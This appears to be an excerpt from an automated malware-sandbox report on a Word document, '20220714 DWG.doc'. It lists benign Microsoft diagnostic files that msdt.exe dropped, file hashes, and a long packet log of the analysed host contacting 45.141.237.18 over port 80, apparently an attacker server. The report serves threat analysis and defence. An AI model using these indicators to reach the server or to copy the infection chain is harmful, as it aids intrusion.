                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....

                                                                                                                                                                            C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\en-US\CL_LocalizationData.psd1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6650
                                                                                                                                                                            Entropy (8bit):3.6751460885012333
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                            MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                            SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                            SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                            SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.

                                                                                                                                                                            C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\en-US\DiagPackage.dll.mui

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                            Entropy (8bit):3.517898352371806
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                            MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                            SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                            SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                            SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\result\results.xsl

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):48956
                                                                                                                                                                            Entropy (8bit):5.103589775370961
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                            MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                            SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                            SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                            SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="

                                                                                                                                                                            Static File Info

                                                                                                                                                                            General

                                                                                                                                                                            File type:Zip archive data, at least v2.0 to extract
                                                                                                                                                                            Entropy (8bit):7.965614028395722
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                            • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                            • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                            File name:20220714 DWG.doc
                                                                                                                                                                            File size:952586
                                                                                                                                                                            MD5:5fd0deaaca6ac9645ba3e9aa8af3311c
                                                                                                                                                                            SHA1:4823c45cde3606a5189462a8c4441686706d04f3
                                                                                                                                                                            SHA256:b78c36823ab0b86b683d165e53405855b8e910c5011997e5a4a4620200cffc0a
                                                                                                                                                                            SHA512:f437de0000c2b6aa2c42c9d750b723385da1bf0bce22f2008116392a12a7d168cc8bdf5065fd232889087512ef321a20578e5c4fdb24cd08a5ebf33d31167e1d
                                                                                                                                                                            SSDEEP:24576:i1yg5B+jHQ89ihbudaSMcKdth3ut3w7mM4nnl:iJzQQ8U4fwdqtb3l
                                                                                                                                                                            TLSH:D51512C5B9A69E8AC3D297318F7DD8005F3BB5734188142EF5C2E65834C7AD6CA53B22
                                                                                                                                                                            File Content Preview:PK........o..T................[Content_Types].xml<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.openxmlformats-offi

                                                                                                                                                                            File Icon

                                                                                                                                                                            Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                                            Network Behavior

                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                            TCP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Jul 15, 2022 15:26:38.624989033 CEST4974380192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:38.653028965 CEST804974345.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:38.653151035 CEST4974380192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:38.653311014 CEST4974380192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:38.692662954 CEST804974345.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:38.766454935 CEST4974380192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:38.795556068 CEST804974345.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:39.005131960 CEST4974380192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:41.906877995 CEST4974380192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:41.980675936 CEST804974345.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:42.091593027 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.114799023 CEST4974380192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.138933897 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:42.139050007 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.139308929 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.169883966 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:42.169908047 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:42.169924974 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:42.169941902 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:42.169961929 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.169997931 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.365726948 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.398989916 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:42.399194956 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.581449032 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.629255056 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:42.629627943 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.675403118 CEST4974380192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.736707926 CEST804974345.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:42.776770115 CEST4974380192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.805774927 CEST804974345.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:42.814599991 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.846234083 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:42.846327066 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.859576941 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.890403986 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:42.890522003 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:43.005486012 CEST4974380192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:43.063157082 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:43.091305971 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:43.091485023 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:43.149804115 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:43.180100918 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:43.180160999 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:43.180284977 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:43.180324078 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:45.406270981 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:45.437230110 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:26:45.437338114 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:24.329664946 CEST4974380192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:24.329761028 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:24.357307911 CEST804974345.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:24.357343912 CEST804974445.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:24.357465029 CEST4974380192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:24.357477903 CEST4974480192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.387466908 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.417253971 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.417470932 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.418613911 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.452181101 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.452215910 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.452234983 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.452253103 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.452270031 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.452286959 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.452303886 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.452318907 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.452342033 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.452368021 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.452393055 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.452434063 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.452567101 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.481878996 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.481935978 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.481952906 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.481969118 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.481982946 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482000113 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482014894 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482031107 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482047081 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482053995 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.482064009 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482080936 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482098103 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482112885 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482129097 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482132912 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.482161999 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.482178926 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.482180119 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482198000 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482238054 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482254028 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.482285023 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482316971 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.482362986 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.482404947 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.484116077 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.511667013 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511697054 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511715889 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511732101 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511750937 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511768103 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511785984 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511804104 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511820078 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511840105 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.511862040 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511867046 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.511881113 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511897087 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511900902 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.511914968 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511933088 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511941910 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.511949062 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.511977911 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512011051 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512028933 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512048960 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512073994 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512079000 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512095928 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512110949 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512125015 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512142897 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512142897 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512161970 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512176991 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512187958 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512206078 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512212038 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512232065 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512249947 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512265921 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512283087 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512295008 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512322903 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512347937 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512351990 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512370110 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512372971 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512412071 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512464046 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512465954 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512526035 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.512533903 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512552023 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512567997 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.512609959 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.513432980 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.513453007 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.513525963 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539670944 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539702892 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539721966 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539738894 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539740086 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539758921 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539767981 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539777040 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539793015 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539809942 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539820910 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539825916 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539843082 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539844036 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539861917 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539869070 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539879084 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539896965 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539906025 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539913893 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539933920 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539942026 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539949894 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539968014 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.539969921 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.539988995 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540007114 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540015936 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540024996 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540043116 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540076017 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540093899 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540112972 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540139914 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540148973 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540175915 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540180922 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540198088 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540215969 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540225029 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540232897 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540251017 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540263891 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540288925 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540292978 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540308952 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540338039 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540354967 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540354967 CEST4976680192.168.2.345.141.237.18
